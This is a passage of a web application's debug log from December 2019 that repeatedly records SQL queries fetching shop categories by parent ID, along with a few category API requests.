4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:26:46,591 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:26:46,594 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:26:46,599 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) [19/Dec/2019 13:26:46] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-19 13:26:46,601 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:26:46,604 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:26:46,606 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:26:46,608 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:26:46,612 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:26:46,614 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:26:46,616 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:26:46,618 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:26:46,620 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:26:46,624 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:26:46,626 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:26:46,628 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:26:46,630 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:26:46,633 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:26:46,636 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:26:46,638 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:26:46,641 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:26:46,643 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:26:46,645 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:26:46,647 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:26:46,650 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:26:46,652 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:26:46,655 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:26:46,657 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:26:46,659 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:26:46,662 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:26:46,664 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:26:46,667 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:26:46,669 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:26:46,671 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:26:46,674 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:26:46,677 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:26:46,679 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:26:46,681 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:26:46,684 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:26:46,687 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:26:46,690 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:26:46,692 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:26:46,694 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:26:46,697 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:26:46,700 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:26:46] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:26:47,211 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:26:47,221 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:26:47,226 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:26:47,229 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:26:47,233 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:26:47,236 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:26:47,238 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:26:47,240 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:26:47,243 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:26:47,246 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:26:47,249 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:26:47,252 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:26:47,254 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:26:47,256 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:26:47,260 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:26:47,263 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:26:47,271 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:26:47,275 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:26:47,278 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 12; args=(12,) DEBUG 2019-12-19 13:26:47,282 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:26:47,286 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:26:47,287 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:26:47,290 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", 